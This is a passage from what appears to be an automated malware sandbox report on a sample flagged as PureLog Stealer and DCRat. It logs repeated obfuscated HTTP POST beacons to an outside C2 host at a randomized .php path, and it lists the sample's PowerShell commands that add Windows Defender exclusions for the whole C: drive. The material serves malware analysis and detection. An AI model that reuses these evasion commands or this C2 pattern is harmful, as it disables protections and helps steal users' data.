Expect: 100-continue
Jan 8, 2025 18:09:30.905896902 CET | 2596 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:31.237360954 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:31.373687029 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.2.4 | 50063 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:30.772617102 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2192
Expect: 100-continue
Jan 8, 2025 18:09:31.124538898 CET | 2192 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:31.455406904 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:31.590358019 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw / Data Ascii: opaque chunked response body (hex and ASCII dumps not reproduced)


Session ID | Source IP | Source Port | Destination IP | Destination Port
57 | 192.168.2.4 | 50064 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:31.534713984 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:31.890327930 CET | 2596 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:32.216546059 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:32.354458094 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.2.4 | 50065 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:32.493668079 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:32.843327999 CET | 2596 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:33.177985907 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:33.310381889 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.4 | 50066 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:33.469961882 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2584
Expect: 100-continue
Jan 8, 2025 18:09:33.913532972 CET | 2584 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:34.152874947 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:34.302120924 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.4 | 50067 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:34.454812050 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:34.812110901 CET | 2596 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:35.147608042 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:35.278747082 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.2.4 | 50068 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:35.412249088 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:35.765232086 CET | 2596 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:36.128748894 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:36.263461113 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.2.4 | 50069 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:36.392029047 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:36.761734009 CET | 2596 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:37.084903955 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:37.218744040 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.2.4 | 50070 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:36.600409031 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2192
Expect: 100-continue
Jan 8, 2025 18:09:36.952779055 CET | 2192 | OUT | Data Raw / Data Ascii: opaque binary request body (hex and ASCII dumps not reproduced)
Jan 8, 2025 18:09:37.286712885 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:37.417747974 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 11 25 16 07 5c 20 38 25 08 2e 04 2c 13 27 2c 25 5f 3d 33 23 11 3d 23 05 58 28 38 27 03 3f 5d 2d 15 33 05 31 11 22 3f 2d 1e 21 10 2c 5f 02 12 25 1a 3d 32 01 0d 3e 3c 24 01 2b 27 2e 00 23 0b 36 5d 3f 23 2a 54 23 3a 3f 05 31 30 36 12 24 21 30 0a 28 3e 09 5d 2f 2e 0c 07 21 03 21 50 0c 12 20 1a 22 01 24 1d 36 3b 29 1b 2b 06 2a 13 26 35 32 55 25 00 2b 5f 37 1d 2f 1e 33 0a 24 1a 31 38 3c 1f 25 3b 28 03 25 39 28 19 2e 28 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 989%\ 8%.,',%_=3#=#X(8'?]-31"?-!,_%=2><$+'.#6]?#*T#:?106$!0(>]/.!!P "$6;)+*&52U%+_7/3$18<%;(%9(.( S"-S0UQ0
                                                                                        Jan 8, 2025 18:09:37.425204039 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:37.636231899 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:37.636491060 CET2596OUTData Raw: 59 5c 43 5b 5e 5e 52 5d 5e 5c 50 55 50 5a 5a 59 5a 5a 5b 5b 54 5c 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y\C[^^R]^\PUPZZYZZ[[T\U^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=)^%1$Z$%,[>9Y'-?=<?P=.'--_%/<^.-.Y#,Z!+
                                                                                        Jan 8, 2025 18:09:37.850400925 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:37 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.2.4 | 50071 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:38.003626108 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:38.359042883 CET | 2596 | OUT | Data Raw: 59 5a 43 5b 5b 58 57 5f 5e 5c 50 55 50 5a 5a 5f 5a 53 5b 5f 54 54 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: YZC[[XW_^\PUPZZ_ZS[_TTUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>"!Z33'+=.'+(/+P).%'2S., ^3?8X..Y#,Z!+
Jan 8, 2025 18:09:38.673007965 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:38.806103945 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.2.4 | 50072 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:38.942651987 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2592
Expect: 100-continue
Jan 8, 2025 18:09:39.296359062 CET | 2592 | OUT | Data Raw: 59 5b 43 5c 5e 58 52 5d 5e 5c 50 55 50 59 5a 51 5a 5b 5b 5c 54 5d 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y[C\^XR]^\PUPYZQZ[[\T]U^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=!'"435/)9"'=')?P(.'-.('Y8Z:-.Y#,Z!
Jan 8, 2025 18:09:39.617698908 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:39.747412920 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.2.4 | 50073 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:39.876724005 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:40.233989954 CET | 2596 | OUT | Data Raw: 5c 5e 46 5d 5b 5b 52 5d 5e 5c 50 55 50 5e 5a 5c 5a 5c 5b 5a 54 5d 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \^F][[R]^\PUP^Z\Z\[ZT]U_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=12%17%%0])*!]3(V>?<)..W'-"U:<$[9=.Y#,Z!
Jan 8, 2025 18:09:40.566942930 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:40.698646069 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.2.4 | 50074 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:40.855360985 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:41.202729940 CET | 2596 | OUT | Data Raw: 59 58 46 59 5e 5f 52 58 5e 5c 50 55 50 5e 5a 58 5a 5e 5b 5d 54 5d 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: YXFY^_RX^\PUP^ZXZ^[]T]UYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)$806$()Y%-7>?)>Q'./4Z',Y-.Y#,Z!
Jan 8, 2025 18:09:41.639919996 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:41.664629936 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.4 | 50075 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:41.800441027 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2592
Expect: 100-continue
Jan 8, 2025 18:09:42.156336069 CET | 2592 | OUT | Data Raw: 5c 5d 43 5a 5e 5a 57 5b 5e 5c 50 55 50 59 5a 58 5a 58 5b 5f 54 55 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \]CZ^ZW[^\PUPYZXZX[_TUUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:>2!_$0%;*=Z'><)V)&'-2U9?%,8Y:-.Y#,Z!#
Jan 8, 2025 18:09:42.483062029 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:42.614383936 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.4 | 50076 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:42.427438974 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2192
Expect: 100-continue
Jan 8, 2025 18:09:43.116763115 CET | 25 | IN | HTTP/1.1 100 Continue


Target ID: 0
Start time: 12:06:59
Start date: 08/01/2025
Path: C:\Users\user\Desktop\3XtEci4Mmo.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\3XtEci4Mmo.exe"
Imagebase: 0x50000
File size: 3'823'616 bytes
MD5 hash: 529B29E8BCEF9CC790F7C61F40D44B39
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1677214516.0000000000052000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1846719384.00000000129F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 12:07:02
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 12:07:02
Start date: 08/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 12:07:03
Start date: 08/01/2025
Path: C:\Windows\System32\conhost.exe
